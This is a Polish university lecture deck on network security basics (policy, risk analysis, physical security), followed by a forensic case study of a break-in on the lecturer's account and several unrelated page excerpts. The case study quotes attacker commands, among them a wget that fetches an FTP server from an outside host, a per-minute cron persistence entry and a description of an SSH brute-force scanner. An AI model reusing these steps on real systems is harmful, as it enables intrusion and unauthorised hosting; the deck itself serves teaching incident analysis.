Wykład 1. komputerowych Pojęcia podstawowe główne slajdy. 5 października Igor T. Podolak Instytut Informatyki Uniwersytet Jagielloński

Wielkość: px
Rozpocząć pokaz od strony:

Download "Wykład 1. komputerowych Pojęcia podstawowe główne slajdy. 5 października 2011. Igor T. Podolak Instytut Informatyki Uniwersytet Jagielloński"

Transkrypt

1 Wykład 1 Pojęcia podstawowe główne slajdy 5 października 2011 polityka Instytut Informatyki Uniwersytet Jagielloński 1.1

2 Co obejmuje bezpieczeństwo sieci? bezpieczeństwo operacyjnych bezpieczeństwo plikowych i informacji zabezpieczenie dostępu do uwierzytelnianie użytkowników i danych kryptografia i protokoły identyfikacja i uwierzytelnianie użytkowników jedno i dwukierunkowa funkcje haszujace i podpisy cyfrowe protokoły ustanawiania kluczy systemy zarzadzania kluczami dzielenie tajemnic i kryptografia grupowa systemy z wiedza zerowa kontrola dostępu i wykrywanie intruzów w systemie elektroniczny handel i elektroniczne pieniadze bezpieczne protokoły IP bezpieczeństwo oprogramowania polityka 1.2

3 Typy ataków wirusy kradzież sprzętu wewnętrzne naruszenie praw nieuprawniony dostęp odmowa dostępu do usług (DoS) włamania do systemu nieuprawniony dostęp WiFi kradzież informacji przestępstwa finansowe naruszenia telekomunikacyjne złe użycie aplikacji webowych przestępstwa przeciw aplikacjom sieciowym sabotaż polityka 1.3

4 Metody kontroli wewnętrzne audyty testowanie możliwości włamania do systemu automatyczne narzędzia kontroli audyty przez zewnętrzne firmy specjalistyczne śledzenie aktywności poczty śledzenie aktywności aplikacji webowych brak polityka 1.4

5 Czemu bezpieczeństwo jest istotne? tajność dobre ograniczenia zabezpieczaja przed udostępnieniem poufnych informacji integralność dobrze zaprojektowany system ułatwi zapewnić dokładność informacji w systemie; poprawny poziom uchroni przez zmianami czy usunięciem danych przez osoby nieuprawnione dostępność jeśli ktoś usunie lub zniszczy dane, to poprawny system pozwoli je odtworzyć Pytania: jak istotny jest komputer i przechowywane na nim dane? czy zasady w twoim przedsiębiorstwie wymagaja ustanowienia pewnych poziomów? czy audytorzy w przedsiębiorstwie wymagaja ustalonych poziomów w twoim systemie komputerowym? czy w przewidywalnej przyszłości będziesz potrzebować zwiększonego poziomu? polityka 1.5

6 Analiza ryzyka identyfikacja i ocena zasobów identyfikacja możliwych zagrożeń ocena prawdopodobieństwa ataku wektor zagrożeń źródła pracownicy, sprzataj acy, konkurencja, terroryści, pogoda, zatrudnieni z zewnatrz, wykonawcy zagrożenia kradzież lub utrata sprzętu czy informacji, ujawnienie informacji, szpiegostwo, przestępstwa finansowe, DoS, utrata i zmiana danych, błędy ludzkie, problemy sprzętowe, błędy sprzętowe, złe użycie danych, fizyczne niebezpieczeństwo cele sprzęt komputerowy i telekomunikacyjny, miejsca przechowywania danych, systemy operacyjne, oprogramowanie, dokumentacja, dane, własność intelektualna, poczta komputerowa, telefony i faksy, informacja, zdrowie i bezpieczeństwo polityka 1.6

7 Wektor zagrożeń istnieje szereg zdefiniowanych wektorów zagrożeń wykonawcy przestępstwa finansowe sprzęt telekomunikacyjny terroryści fizyczne niebezpieczeństwo zdrowie i bezpieczeństwo wektory ułatwiaja projektowanie bezpiecznego systemu pozwalaja na odpowiedzi na pytania typu Po co nam wewnętrzna kontrola jeśli mamy zaporę (firewall)? poprzez wskazanie różnych dróg polityka 1.7

8 modele lizaka pojedyncza zapora wokół zasobów (ang. lollipop) system nie zabezpieczony po przekroczeniu ogrodzenia system nie ustala poziomów nie zabezpiecza przed wewnętrznymi atakami podstawowym narzędziem jest tu zapora ogniowa (firewall) cebulkowy szereg warstw określajacych kolejne poziomy warstwy dostępu, identyfikacji, audytu, monitorowania, segmentacji, fizycznej ochrony włamywacz musi pokonać szereg kolejnych zabezpieczeń możliwe określenie poziomów zaufania często jest tylko jeden sposób identyfikacji, np. hasło większość identyfikacji może być zbudowana w postaci warstwowej polityka 1.8

9 modele strefy zaufania systemy lizaka i cebulkowy sa bardzo trudne do połaczenia, np. w przypadku połaczania firm czy też głębszej współpracy (szczególnie gdy jest czasowa) podział systemu w zależności od funkcjonalności różne poziomy zaufania do różnych części systemu konieczne bardzo dobre śledzenie interfejsów pomiędzy różnymi częściami systemu wykorzystanie reguł zapór i list kontroli dostępu ACL polityka 1.9

10 bezpieczeństwo z punktu widzenia użytkowników ograniczenia użytkowników konfiguracja systemu jest z jednej strony ograniczajaca dla użytkowników pozwalajac im na mniej, z drugiej strony wzmacnia ona użytkowników przez usunięcie niepotrzebnych zadań i zabezpieczenie przed popełnieniem błędów ograniczanie użytkowników do pewnych funkcji ograniczanie pewnych funkcji systemu ustalanie kto może korzystać z których zasobów zabezpieczenie przed niepoprawnym użyciem jak monitorować działanie planu? polityka 1.10

11 Polityka (security policy) podstawowe wskazania w jaki sposób należy chronić fizyczne i informacyjne zasoby firmy podstawowy sposób w jaki oczekiwania zarzadu względem sa tłumaczone na zestaw sprawdzalnych celów reguły polityki zawieraja reguły ułatwiajace ochronę wartościowych, tajnych, podlegajacych prawom własności zasobów wykluczyć badź zminimalizować ewentualna odpowiedzialność prawna wobec osób trzecich ograniczyć straty czy złe wykorzystanie zasobów firmy polityka reguły polityki s a w formie pisanej reguły polityki mówi a co ma być zrobione nie jak to ma być zrobione 1.11

12 reguły polityki zapewniaja tajność i spójność danych zabezpieczaja przed ich niepoprawnym użyciem pozwalaja użytkownikom zrozumieć co jest od nich oczekiwane kadra zarzadzaj aca by wiedzieli jakie sa ich role, odpowiedzialność, i jakie powinni podejmować działania kadra techniczna by wiedzieli jak, kiedy, i gdzie kontrola może być użyta w sieci komputerowej, zasobach, innym sprzęcie wszyscy zatrudnieni by wiedzieli w jaki sposób maja wypełniać codzienne obowiazki by być zgodnymi z oczekiwaniami polityka 1.12

13 tworzenie reguł polityki w tworzeniu reguł musi wziać udział wiele działów HR odpowiedzialne za zatrudnianie i karanie pracowników; zbiera od pracowników certyfikaty, że zrozumieli reguły dział prawny odpowiedzialny za reprezentację firmy wewnatrz i na zewnatrz; zgodność reguł polityki z prawem IT gdyż pracownicy tego działu sa zwykle największymi konsumentami zasobów jednak nie oni powinni być głównymi autorami reguł ochrona fizyczna polityka adresatami reguł polityki sa wszyscy pracownicy wykonawcy, kontraktorzy, konsultanci, serwis, pracownicy czasowi partnerzy biznesowi, sprzedawcy klienci korzystajacy z zasobów informacyjnych 1.13

14 organizacja polityki reguły polityki odnosza się do zwykle do administracji systemem; z jakich należy korzystać narzędzi; czego firma oczekuje od administratorów zarzadzania personelem mówia pracownikom w jaki sposób maja wykonywać codzienne zadania, np. w jaki sposób operować z wrażliwymi danymi fizycznego generalnie do wszystkich w jaki sposób radzić sobie z bezpieczeństwem fizycznym polityka reguły mówia co musi być zrobione reguły nie mówia w jaki sposób ma to być zrobione implementacja musi być oddzielona od samych reguł reguły nie moga zależeć od konkretnych technologii by być skuteczne, reguły musza być jasne i łatwe do zrozumienia 1.14

15 Rekonesans IP najpierw konieczne wykrycie prawdopodobnych nazw domen w standardowych spisach wykrycie właścicieli domen w systemach rejestrujacych wyszukiwanie wszystkich domen posiadanych przez organizację whois ICANN dla domen.com,.net,.org dla innych inne serwery whois USA: Europa: domeny.com,.org,.net,.edu: inne narzędzia whois is usługa powinna działać na porcie 43, obecnie głównie przez http polityka 1.15

16 planowanie elementów procesu bezpieczeństwo fizyczne jak zabezpieczyć sprzęt i nośniki danych to nie jest część systemu, jednak jest ściśle zwiazane aplikacje opis celów podstawowych obiektów i zasobów systemu podstawa dla dalszych kroków, nie jest wprowadzana do systemu ogólne podejście jaki będzie ogólny poziom wybór odpowiednich parametrów grupy użytkowników ustalenie zasad podziału użytkowników na grupy profile użytkowników przypisanie użytkowników do grup zdefiniowanie istotnych elementów odróżniajacych grupy bezpieczeństwo zasobów instalacje aplikacji polityka 1.16

17 planowanie elementów procesu bezpieczeństwo fizyczne aplikacje ogólna strategia jaki będzie ogólny poziom wybór odpowiednich parametrów grupy użytkowników ustalenie zasad podziału użytkowników na grupy profile użytkowników przypisanie użytkowników do grup zdefiniowanie istotnych elementów odróżniajacych grupy bezpieczeństwo zasobów które zasoby (aplikacje) powinny być dostępne dla wszystkich, które dla niektórych definicje grup użytkowników instalacje aplikacji decyzja jak ustalać własność aplikacji i bibliotek w systemie polityka 1.17

18 bezpieczeństwo fizyczne gdzie postawić sprzęt komputerowy? jakie ma wymagania? jakie sa potencjalne ryzyka (np. wyłaczenie systemu)? najlepiej w zamkniętym pomieszczeniu o ograniczonym dostępie utworzyć formularz fizycznego z podstawowymi odpowiedziami: jakie sa wykorzystane metody zabezpieczenia, gdzie jest przechowywany klucz do dostępu, jakie sa standardowe ustawienia, inne. gdzie przechowywać dokumentację i nośniki danych gdzie umieszczone będa wszystkie stacje robocze? gdzie drukarki? jakiego dodatkowego sprzętu potrzebujemy (okablowanie, linie telefoniczne, etc.)? co robić w przypadkach awaryjnych (pożar, zalanie wod a, etc.)? polityka 1.18

19 bezpieczeństwo fizyczne gdzie postawić sprzęt komputerowy? jakie ma wymagania? jakie sa potencjalne ryzyka (np. wyłaczenie systemu)? gdzie przechowywać dokumentację i nośniki danych narzędzia serwisowe i hasła dostępu administratora sa krytyczne dla działania systemu urzadzenia kopii zapasowych i media moga zostać skradzione lub zniszczone gdzie umieszczone będa wszystkie stacje robocze? stacje robocze moga być użyte przez nieuprawnione osoby (dostęp w miejscach publicznych, nienadzorowana praca w miejscach prywatnych) nie umieszczać w bardzo publicznych lub bardzo prywatnych miejscach zwracać uwagę użytkownikom na konieczność wylogowywania się z systemu po zakończeniu pracy ograniczać które funkcje systemu użytkownicy moga wykonywać w miejscach publicznych ograniczać możliwość logowania w wielu miejscach gdzie drukarki? jakiego dodatkowego sprzętu potrzebujemy (okablowanie, linie telefoniczne, etc.)? co robić w przypadkach awaryjnych (pożar, zalanie woda, etc.)? polityka 1.19

20 bezpieczeństwo fizyczne gdzie postawić sprzęt komputerowy? jakie ma wymagania? jakie sa potencjalne ryzyka (np. wyłaczenie systemu)? gdzie przechowywać dokumentację i nośniki danych narzędzia serwisowe i hasła dostępu administratora sa krytyczne dla działania systemu urzadzenia kopii zapasowych i media moga zostać skradzione lub zniszczone gdzie umieszczone będa wszystkie stacje robocze? stacje robocze moga być użyte przez nieuprawnione osoby (dostęp w miejscach publicznych, nienadzorowana praca w miejscach prywatnych) gdzie drukarki? drukarki w miejscach publicznych moga pozwolić na nieuprawniony dostęp do informacji w przypadku małej liczby drukarek może się okazać, że trzeba będzie drukować poufne wiadomości (np. czeki) w publicznych miejscach zwracać uwagę pracownikom na nie zwiazane z drukiem w publicznych miejscach nie ustawiać drukarek w publicznych miejscach drukować poufne informacje tylko w ustalonych porach utworzyć opis wszystkich drukarek wraz z zagrożeniami jakiego dodatkowego sprzętu potrzebujemy (okablowanie, polityka 1.20

21 planowanie aplikacji jakie informacje zamierzamy przechowywać w systemie? kto będzie potrzebował dostępu do tych informacji? czy użytkownicy potrzebuja dostępu tylko do czytania czy także do zmiany? konieczne jest określenie które aplikacje będa wykorzystywane do dostępu do danych tu przydatny diagram dostępu aplikacji do bibliotek polityka 1.21

22 tworzenie ogólnej strategii najpierw decyzje co do ogólnego podejścia do w systemie konieczne wyrównanie potrzeb dzisiaj i tych w przyszłości tworzenie strategii wybór poziomu uproszczony, średni, wysoki wykorzystaj opis aplikacji dla określenia kto powinien mieć dostęp do których oceń wykorzystywane w systemie technologie, np. jest czy nie ma dostępu do Internetu przedyskutuj kwestię poziomu z audytorami określ wymagania względem krytycznych zasobów: ich tajność, ich kompetytywność, ich wykorzystanie w ciagu dnia pracy wybór parametrów zwiazanych z logowaniem się użytkowników w systemie wybór parametrów zwiazanych z hasłami wykorzystanie wartości systemowych do wyregulowania systemu polityka 1.22

23 zauważyłem w historii swojego komputera ul.ii.uj.edu.pl 960 uptime 961 df -h 962 pwd 963 ps x 964 mkdir.init 965 cd.init polityka 966 wget ftp://happy:scanning@ :55955/ftpd tar zxf ftpd tar.gz 968 rm ftpd tar.gz 969 mv ftp4all/*. 970 rmdir 971./configure czy to było włamanie??? 1.23

24 ściagnięty serwer ftp ftp4all, kompilacja instalacja do specjalnie zalożonej kartoteki.init w mojej kartotece domowej skopiowane wszystkie pliki z.init/bin do.init/standard/sbin, nastepnie przekopiowal standard/sbin do sbin zmiana nazwy wykonywalnego pliku na xvmr - czy z czymś się kojarzy? podkartoteka ze źródłami wymazana, jednak ftp4all jest do ściagnięcia i można powtórzyć prawdopodbne operacje w etc/ftpd.reg ustawione sa adminport numer portu obsługi dla administratora ftp port 5902 w /home/igor/.init/f numer portu gdzie serwer jest dostępny 5902 to jeden z portow wykorzystywanych przez Xvnc otwarty na komputerze włamywacz musiał wcześniej skanować porty polityka 1.24

25 W plikach msg/goodbye, msg/welcome, i msg/startup szereg zabawnych komunikatów: msg/startup: FTP server ready. Preceeding... polityka msg/welcome: Welcome, 2 Another Great Server BY, -=FLOTILLA=msg/goodbye: GOOdBye, Hope 2 See U Again SOON...(= zabawne, prawda? 1.25

26 Crontab edycja mojej lokalnej tablicy cron, polegajaca na stałym uruchamianiu pliku xvmr, patrz lokalna tablica crontab: * * * * /home/igor/.init/sbin/xvmr a więc co minutę. poprawka naniesiona była 2 sierpnia o 19:45; to lokalizuje datę włamania polityka 1.26

27 Skad to włamanie? W pliku /var/log/secure, pomiędzy wieloma nieudanymi, jest niepokojacy wpis, powtarzajacy się wiele razy August 2: 15:51:26: Address maps to sip.ber this does not map back to the address - POSSIBLE BREAKI po wykorzystaniu odwrotnego mapowania dig -x dostajemy nazwę sip.bernaunet.de, jednak mapowanie wprost dig sip.bernaunet.de zwraca adres , stad to ostrzeżenie. poszukiwanie przez WWW adresu daje stronę firmy Wikom Elektrik GmbH włamywacz uruchamia swój program z wielu miejsc na świecie (albo jest ich wielu), gdzie włamał sie juz wcześniej nie wiadomo wciaż jaki jest oryginalny adres wlamywacza polityka 1.27

28 Xvnc last -f./wtmp nie pokazuje żadnego logowanie w okolicach feralnych modyfikacji ale wykorzystał dla ftp port 5902, a więc port Xvnc, a serwer Xvnc był uruchomiony, a także klient Xvnc dostał sie pewnie przez zalogowanie do otwartego wtedy połaczenia Xvnc ekran klienta Xvnc po ponownym połaczeniu z serwerem jest czarny i nic nie pomaga w jego uaktywnieniu, a serwer Xvnc na pewno dziala Czy Xvnc zapisuje gdzieś ślady dostępu??? ostatnie polecenie włamywacza to 1000 vncconfig -set AcceptpointerEvents=0 ; vncconfig -set AcceptkeyEvents=0 ; exit w której zmienia ustawienia konfiguracji vnc! Oto znaczenia zmienionych parametrów Xvnc polityka AcceptPointerEvents: Accept pointer press and release e clients (default is on). tu włamywacz wyłaczył dzialanie myszki (pointer) 1.28

29 a co jest w środku? W kartotece.init/f sa bardzo dziwne pliki: drwxrwxr-x 5 igor igor 4096 Aug 2 19:51. drwxrwxr-x 11 igor igor 4096 Aug 2 19:41.. drwx igor igor 4096 Aug 2 19:48???? 100MBiT.PL 10GB LINUX??? drwx------??? 2 igor igor 4096 Aug 2 19:48???? Dupe-FxP? polityka? drwx igor igor 4096 Aug 2 FLOTILLA procesu??? -rw igor igor 48 Aug 2 19:49.permissions Pliki.permissions w podkartotekach sa identyczne, jednak różne od tego w glownej podkartotece f w historii włamania jest polecenie utworzenia podkartoteki f, jednak nie sa utworzone żadne dalsze podkartoteki czy same pliki.permissions wyglada na to, że włamywacz utworzył sam serwer ftpd 1.29

30 połaczenie z serwerem następuje przez ftp ul 5902 poł aczenie z portem administracji nie powodzi się (telnet ul 60283) włamywacz albo źle zainstalowal serwer albo nie miał zamiaru nim administrować polityka 1.30

31 Błędy włamywacza nie wyczyscił historii poleceń uruchomiony proces /home/igor/.init/xvmr wyświetla się w liście procesów ps -aux grep igor nie usunał wielu zbędnych już plikow z kartoteki.init, a usunał pliki źródłowe nie zadbał o to, by crontab nie wysyłał co chwilę maila o uruchomieniu serwera, np. From igor@ul.ii.uj.edu.pl Mon Aug 7 11:01: Date: Mon, 7 Aug :01: From: root@ul.ii.uj.edu.pl (Cron Daemon) To: igor@ul.ii.uj.edu.pl polityka Subject: Cron <igor@ul> /home/igor/.init/sbin/xvmr X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/home/igor> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=igor> X-Cron-Env: <USER=igor> FTP4ALL 3.012, Copyright (C) by Crescent (cre This program is FREE SOFTWARE and distributed under GNU 1.31 ale kto czyta pocztę roota?

32 co robić? wykasować kartotekę serwera ftpd, usunać wpis z tablicy crontab poczekać na połaczenie by wykryć włamywacza zmienić hasło uzytkownika igor sprawdzić tego użytkownika na innych komputerach ustawić blokadę dostępu do połaczeń tcp wykorzystujac tcp_wrappers sprawdzić adres użytkownika, ktory odgadł haslo polityka 1.32

33 Prosty skrypt uruchomiłem prosty skrypt #!/usr/bin/perl open(logfile, ">>slad.txt"); while(true) { $s = netstat --tcp grep "ul.ii.uj.edu.pl:5902\\ ul } if(length($s) > 0) { $d = date ; chomp $d; chomp $s; print LOGFILE "\$d:\n\$s\n"; $s = ""; } $p = sleep 60; majacy wyłapac wszelkich potencjalnych "klientów" serwera, w domyśle włamywacza, bo któż inny może o założonym serwerze wiedziec? ale może włamywacz umieścił gdzieś informację i linki o nowym serwerze? polityka 1.33

34 Ktoś korzysta! po kilku dniach plik śladu (ślad.txt) troche sie zapełnił: wlamanie]$ cat slad.txt Fri Aug 4 12:30:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 ESTABLISHE Fri Aug 4 12:31:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 ESTABLISHE Fri Aug 4 12:32:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 FIN\_WAIT2 Sun Aug 6 10:39:32 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:40:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304politykaESTABLISHE Sun Aug 6 10:41:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:42:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:43:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:44:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:45:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:46:34 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:47:34 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 16:49:11 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl: :1253 ESTABLISHE [igor@ul wlamanie]$ Pierwsze 3 linijki to moja wlasna proba, reszta to 1.34

35 Ale co z tego? listing kartoteki.init/f (a wiec korzenia nowego serwera ftp) daje [igor@ul f]$ ll total 32 drwx igor 4096 Aug 2 19:48???? 100MBiT.PL 10GB LINUX???? drwx igor 4096 Aug 2 19:48???? Dupe-FxP????? drwx igor 4096 Aug 2 drwx igor 4096 Aug 6 10:45 Spikes.Women.of.Action.2006.WS.PDTV.XviD-PAP polityka więc, nowy użytkownik załozył nowa kartoteka Spikes.Women.of.Action w której jest trochę nowych plików: igor@ul Spikes.Women.of.Action.2006.WS.PDTV.XviD-PAP]$ ll total rw igor 6518 Aug 6 10:39 PAP-Spikes.Women.of.Act -rw igor Aug 6 10:39 PAP-swoa.r00 -rw igor Aug 6 10:39 PAP-swoa.r01 -rw igor Aug 6 10:40 PAP-swoa.r02 -rw igor Aug 6 10:40 PAP-swoa.r03 -rw igor Aug 6 10:40 PAP-swoa.r04 -rw igor Aug 6 10:40 PAP-swoa.r05 -rw igor Aug 6 10:41 PAP-swoa.r

36 I co jeszcze? a w kartotece.init/f/sample jest plik -rw igor igor Aug 6 10:39 Spikes.Wom razem wiec ok. 350 MB. to po prostu aktywne kobiety, dobrej jakości filmy istnieje coś takiego jak WOA Women of Action Network dig ujawnia domenę reardenstudios.com i serwer homer.reardenstudios.com ( czyżby chcieli ułatwić sobie przekaz? polityka 1.36

37 Sprzatanie skasowany server vnc zmiana hasła użytkownika igor list do z ostrzeżeniem, gdyż jeden z ataków byl przeprowadzony z adresu , ktory mapował się na sip.bernaunet.de a ten na nawww.bernaunet.de, a to była firma Wikom Elektrik GmbH w Bernie odpowiedź w bardzo szybkim tempie (mniej niż 20 minut) z info@ocsb.de: we have taken the affected machine of the net and have exchanged for another. We will analyze the log files and refund announcement against the suitable person. We apologise for your incommodities and can assure you from this server no more attack will go out. MfG bernaunet.de w odpowiedzi na pytanie o szczegóły następujaca odpowiedź a user s account ran obviously whole thus of the hackers has cracked. Then a Kernelbug must have been used with the help of the software to get root rights. polityka 1.37

38 Co robił włamywacz? loguje sie kolejno na kontach sven i potem mtvs sciaga linux3.tgz (w kartotece linux3) z members.lycos.co.uk/neneax/linux3.tgz, rozpakowuje go do kartoteki.m to jest open source irc bot written in C - patrz ściaga z tego samego adresu scanx.tgz rozpakowujac do kartoteki chyba.de (niemiecka domena - firma jest w bernie, ale w niemieckiej domenie) ściaga tez plik de, ktory jest słownikiem niemieckich imion i innych prawdopodobnych nazw użytkowników uruchamia wtedy.de/x (przykładowa nazwa domeny) ten jest skryptem uruchamiajacym.de/scan $1 22, czyli./de scan , a 22 to numer portu ssh - innymi słowy wyszukiwanie serwerów domenie wykorzystujacych ssh, zapisujac ja w pliku uniq.txt polityka 1.38

39 Co robił włamywacz? zbiera listę serwerów i uruchamia.de/xpl 100 german, a więc zapewne po 100 prób na każdym z serwerow xpl próbuje się jednocześnie połaczyc z wieloma serwerami z listy z uniq.txt na każdym próbujac tego samego użytkownika, i zapewne, to samo hasło W ten sposób wielokrotnie przyspiesza działania - mimo, że każda próba logowania trwa ok. 3 sekund, to próbujac kilkaset serwerow jednocześnie dostajemy przyspieszenie a gdzie wyniki? chyba sa online??? bo to GOT...??? albo tez sa zapisywane w pliku vuln.txt xpl jest bardzo podobne do ssh to jakaż przeróbka polityka 1.39

40 Co robił włamywacz? strings xpl pokazuje między innymi %sgot IT!! -> %s:%s:%s jest to więc jakieś wypisanie wyniku, tak jak wyżej jest GOT IT./x > billing:habl99: ale nie jest nigdy ten plik ogladany na koncu wlamywacz oglada plik vuln.txt i później (razem z log.txt, status, i uniq.txt) usuwa go mimo przyspieszenia byłoby dobrze, gdyby włamywacz nie musiał kontrolować działania bezpośrednio i wyniki logowania były wysyłane co jakiś czas dla ulatwienia polityka 1.40

41 J. Pieprzyk, T. Harjano, J. Seberry, Teoria, Springer/Helion N. Ferguson, B. Schneier, Kryptografia w praktyce, Helion B. Schneier, Kryptografia dla praktyków, Wiley / WNT D. Denning, Wojna informacyjna i bezpieczeństwo informacji, ACM/WNT A. Menezes, P. Van Oorschot, S. Vanstone, Handbook of applied Cryptography, CRC ( J. Viega, M. Messier, C i C++ bezpieczne programowanie: receptury, O Reilly/Helion S. Oaks, Java a bazpieczeństwo, O Reilly/RM C. Peikari, A. Chuvakian, Strażnik danych, O Reilly/Helion polityka 1.41

BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH

BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH Igor T. Podolak Instytut Informatyki UJ 8 październik 2008 IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 1 / 35 CO OBEJMUJE

Bardziej szczegółowo

ZAŁĄCZNIK Nr 1 do CZĘŚCI II SIWZ

ZAŁĄCZNIK Nr 1 do CZĘŚCI II SIWZ ZAŁĄCZNIK Nr 1 do CZĘŚCI II SIWZ WYMAGANIA BEZPIECZEŃSTWA DLA SYSTEMÓW IT Wyciąg z Polityki Bezpieczeństwa Informacji dotyczący wymagań dla systemów informatycznych. 1 Załącznik Nr 1 do Część II SIWZ SPIS

Bardziej szczegółowo

ZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ

ZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ ZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ WYMAGANIA BEZPIECZEŃSTWA DLA SYSTEMÓW IT Wyciąg z Polityki Bezpieczeństwa Informacji dotyczący wymagań dla systemów informatycznych. 1 Załącznik Nr 3 do Część II SIWZ Wymagania

Bardziej szczegółowo

Instrukcja konfiguracji funkcji skanowania

Instrukcja konfiguracji funkcji skanowania Instrukcja konfiguracji funkcji skanowania WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_PL 2004. Wszystkie prawa zastrzeżone. Rozpowszechnianie bez zezwolenia przedstawionych materiałów i informacji

Bardziej szczegółowo

Wykład 6: Bezpieczeństwo w sieci. A. Kisiel, Bezpieczeństwo w sieci

Wykład 6: Bezpieczeństwo w sieci. A. Kisiel, Bezpieczeństwo w sieci N, Wykład 6: Bezpieczeństwo w sieci 1 Ochrona danych Ochrona danych w sieci musi zapewniać: Poufność nieupoważnione osoby nie mają dostępu do danych Uwierzytelnianie gwarancja pochodzenia Nienaruszalność

Bardziej szczegółowo

System Kancelaris. Zdalny dostęp do danych

System Kancelaris. Zdalny dostęp do danych Kancelaris krok po kroku System Kancelaris Zdalny dostęp do danych Data modyfikacji: 2008-07-10 Z czego składaj adają się systemy informatyczne? System Kancelaris składa się z dwóch części: danych oprogramowania,

Bardziej szczegółowo

Windows W celu dostępu do i konfiguracji firewall idź do Panelu sterowania -> System i zabezpieczenia -> Zapora systemu Windows.

Windows W celu dostępu do i konfiguracji firewall idź do Panelu sterowania -> System i zabezpieczenia -> Zapora systemu Windows. Bezpieczeństwo Systemów Informatycznych Firewall (Zapora systemu) Firewall (zapora systemu) jest ważnym elementem bezpieczeństwa współczesnych systemów komputerowych. Jego główną rolą jest kontrola ruchu

Bardziej szczegółowo

7. zainstalowane oprogramowanie. 8. 9. 10. zarządzane stacje robocze

7. zainstalowane oprogramowanie. 8. 9. 10. zarządzane stacje robocze Specyfikacja oprogramowania do Opis zarządzania przedmiotu i monitorowania zamówienia środowiska Załącznik nr informatycznego 1 do specyfikacji Lp. 1. a) 1. Oprogramowanie oprogramowania i do systemów

Bardziej szczegółowo

Serwer SSH. Wprowadzenie do serwera SSH Instalacja i konfiguracja Zarządzanie kluczami

Serwer SSH. Wprowadzenie do serwera SSH Instalacja i konfiguracja Zarządzanie kluczami Serwer SSH Serwer SSH Wprowadzenie do serwera SSH Instalacja i konfiguracja Zarządzanie kluczami Serwer SSH - Wprowadzenie do serwera SSH Praca na odległość potrzeby w zakresie bezpieczeństwa Identyfikacja

Bardziej szczegółowo

INSTRUKCJA OBSŁUGI DLA SIECI

INSTRUKCJA OBSŁUGI DLA SIECI INSTRUKCJA OBSŁUGI DLA SIECI Zapisywanie dziennika druku w lokalizacji sieciowej Wersja 0 POL Definicje dotyczące oznaczeń w tekście W tym Podręczniku użytkownika zastosowano następujące ikony: Uwagi informują

Bardziej szczegółowo

1. Zakres modernizacji Active Directory

1. Zakres modernizacji Active Directory załącznik nr 1 do umowy 1. Zakres modernizacji Active Directory 1.1 Opracowanie szczegółowego projektu wdrożenia. Określenie fizycznych lokalizacji serwerów oraz liczby lokacji Active Directory Określenie

Bardziej szczegółowo

Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych

Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych Krzysztof Młynarski (krzysztof.mlynarski@teleinformatica.com.pl) Teleinformatica Pomimo występowania bardzo wielu

Bardziej szczegółowo

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne Jarosław Kuchta Internetowe Usługi Informacyjne Komponenty IIS HTTP.SYS serwer HTTP zarządzanie połączeniami TCP/IP buforowanie odpowiedzi obsługa QoS (Quality of Service) obsługa plików dziennika IIS

Bardziej szczegółowo

CitiDirect Online Banking - portal CitiDirect EB

CitiDirect Online Banking - portal CitiDirect EB CitiDirect Online Banking - portal CitiDirect EB Dodatkowa informacja dotycząca konfiguracji zabezpieczeń oprogramowania Java Pomoc Techniczna CitiDirect CitiService Pomoc Techniczna CitiDirect Tel. 0

Bardziej szczegółowo

Doskonalenie podstaw programowych kluczem do modernizacji kształcenia zawodowego

Doskonalenie podstaw programowych kluczem do modernizacji kształcenia zawodowego rojekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego 9. Administracja sieciowymi systemami operacyjnymi Uszczegółowione efekty kształcenia Uczeń po zrealizowaniu zajęć

Bardziej szczegółowo

Zadanie 1 Treść zadania:

Zadanie 1 Treść zadania: Zadanie 1 Treść zadania: 1 2 Komentarz do zadania: Ocenie podlegały następujące elementy projektu: 1. Tytuł pracy egzaminacyjnej. 2. Założenia do projektu. 3. Lista prawdopodobnych przyczyn usterki systemu

Bardziej szczegółowo

Bezpieczeństwo danych i systemów informatycznych. Wykład 1

